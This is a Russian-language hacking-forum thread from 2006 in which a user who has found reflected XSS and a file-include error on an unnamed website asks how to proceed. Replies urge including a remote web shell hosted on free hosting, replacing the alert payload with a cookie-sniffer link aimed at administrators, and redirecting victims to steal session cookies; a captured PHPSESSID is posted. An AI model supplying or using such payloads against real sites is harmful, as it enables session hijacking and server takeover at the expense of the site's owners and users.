HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Подскажите, что следует делать дальше...
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите, что следует делать дальше...
  #1  
Старый 14.01.2006, 14:57
Jonathan Allen
Познающий
Регистрация: 21.03.2005
Сообщений: 71
С нами: 11125766

Репутация: 15
По умолчанию Подскажите, что следует делать дальше...
Есть сайт, работает xss

Если написать вот так:

http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script>

То, как видно из скрипта - вылетает табличка с название сайта. Работет и такое, например....

http://[САЙТ]/?node=tralala

Соответственно имеем такое:

Warning: main(pages/tralala.php): failed to open stream: No such file or directory in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5

Код:
Warning: main(): Failed opening 'pages/tralala.php' for inclusion (include_path='.:/usr/share/php') in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5
И так далее...


Скажите, пожалуйста, что делать дальше?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.01.2006, 19:05
TTyck
Участник форума
Регистрация: 13.11.2005
Сообщений: 199
С нами: 10785229

Репутация: 75
По умолчанию
поставляй вместо тралала адрес на шел, предварительно тобой залитый на бесплатный хостинг.
 
Ответить с цитированием

  #3  
Старый 14.01.2006, 19:11
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию
буит примерно так http://[САЙТ]/?node=http://site.narod.ru/shell.php
Удачи тебе)))
 
Ответить с цитированием

  #4  
Старый 14.01.2006, 19:50
dim_ok
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
С нами: 11118506

Репутация: 185
По умолчанию
ну с http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> это только менять алерт на ссылу со сниффером и пробовать подсовывать админам и т.п. вообщем прилигированным пользователям, и то если там используются куки для авторизации
а с http://[САЙТ]/?node=tralala у тебя ничего не выйдет т.к. ты не сможешь выдти за пределы папки pages
__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat
 
Ответить с цитированием

  #5  
Старый 14.01.2006, 20:19
Jonathan Allen
Познающий
Регистрация: 21.03.2005
Сообщений: 71
С нами: 11125766

Репутация: 15
По умолчанию
Спасибо, ребята но с шеллом ничего не вышло...


dim_ok

Если сдеать вот так:

http://[САЙТ]/?node=></td></tr></form></table><script>alert(document.cookie);</script>

То мне вылетает такое сообщение

PHPSESSID=76a45e1a35900e78ddfb180e83a6b379;_c=y


Это что-то дает? Или находу генерирует?
 
Ответить с цитированием

  #6  
Старый 14.01.2006, 23:47
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию
Делай редирект на страницу и засовывай туда Java script код чтобы угонять куки посмотреть его можно на главной странице античате где идёт надрись"описание снифера".
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Выполняется sql inj что делать дальше?) zveri Болталка 1 04.08.2005 23:37
подскажите что эта ссылка умеет делать Orlow Болталка 1 20.07.2005 04:01
Нашел дыру, но не знаю че делать дальше - помогите новичку :) m4e Болталка 21 23.06.2005 15:45
ПОДСКАЖИТЕ что делать дальше?! ][s0u1 Болталка 24 30.04.2005 10:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.